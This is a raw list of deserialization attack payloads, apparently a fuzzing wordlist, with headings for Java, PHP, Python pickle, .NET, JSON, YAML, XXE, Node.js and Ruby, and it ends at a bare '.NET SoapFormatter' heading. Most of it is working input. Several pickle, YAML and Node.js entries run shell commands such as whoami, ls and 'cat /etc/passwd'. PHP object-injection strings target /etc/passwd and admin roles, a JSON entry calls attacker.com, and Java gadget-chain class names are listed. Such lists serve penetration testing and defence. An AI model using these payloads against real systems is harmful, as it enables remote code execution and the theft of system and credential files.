# Deserialization Payloads # Java serialized object patterns rO0ABXNy aced0005 H4sIAAAAAAAA # PHP serialization O:8:"stdClass":0:{} a:1:{i:0;s:5:"admin";} O:4:"User":1:{s:4:"role";s:5:"admin";} O:10:"Evil_Class":0:{} # Python pickle \x80\x03cos (S'whoami' tR. # .NET deserialization AAEAAAD///// # JSON deserialization attacks {"@type":"java.net.URL","val":"http://attacker.com"} {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('calc')}()"} # YAML deserialization !!python/object/apply:os.system ['calc'] !!python/object/new:os.system [calc] # XML deserialization/XXE ]> &xxe; # Base64 encoded payloads # Java: rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ== # PHP: TzoxMDoiRXZpbF9DbGFzcyI6MDp7fQ== # Gadget chains (Java) CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 Groovy1 Spring1 Spring2 # Node.js deserialization {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls')}()"} {"__proto__":{"isAdmin":true}} # Ruby Marshal \x04\x08o:\x10User\x06:\x0arole:\x0aadmin # Advanced Java gadget chains # Apache Commons Collections org.apache.commons.collections.Transformer org.apache.commons.collections.functors.InvokerTransformer org.apache.commons.collections.functors.ChainedTransformer org.apache.commons.collections.functors.ConstantTransformer org.apache.commons.collections.keyvalue.TiedMapEntry org.apache.commons.collections.map.LazyMap # Spring Framework org.springframework.context.support.ClassPathXmlApplicationContext org.springframework.beans.factory.config.PropertyPathFactoryBean # C3P0 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase com.mchange.v2.c3p0.JndiRefForwardingDataSource # Hibernate org.hibernate.engine.spi.TypedValue org.hibernate.tuple.component.AbstractComponentTuplizer # Vaadin com.vaadin.data.util.NestedMethodProperty com.vaadin.data.util.PropertysetItem # Advanced PHP serialization O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";} O:11:"PDOStatement":0:{} a:2:{i:0;O:8:"stdClass":0:{}i:1;s:5:"admin";} O:12:"SplFileObject":1:{s:0:"";s:11:"/etc/passwd";} # PHP object injection with magic methods O:10:"Evil_Class":1:{s:8:"filename";s:11:"/etc/passwd";} O:4:"User":2:{s:2:"id";i:1;s:4:"role";s:5:"admin";} O:7:"PhpCode":1:{s:4:"code";s:6:"system";} # Advanced Python pickle \x80\x03csubprocess\ncheck_output\n(S'ls'\ntR. \x80\x03csubprocess\nPopen\n(S'calc'\ntR. \x80\x03cos\nsystem\n(S'whoami'\ntR. cos\nsystem\n(S'cat /etc/passwd'\ntR. # Python pickle RCE variants c__builtin__\neval\n(S'__import__("os").system("ls")'\ntR. \x80\x03c__builtin__\nexec\n(S'import os;os.system("whoami")'\ntR. # .NET BinaryFormatter AAEAAAD/////AQAAAAAAAAAMAgAAAE1TeXN0ZW0u AAEAAAD/////AQAAAAAAAAAEAQAAAClT # .NET ObjectStateFormatter /wEy # .NET SoapFormatter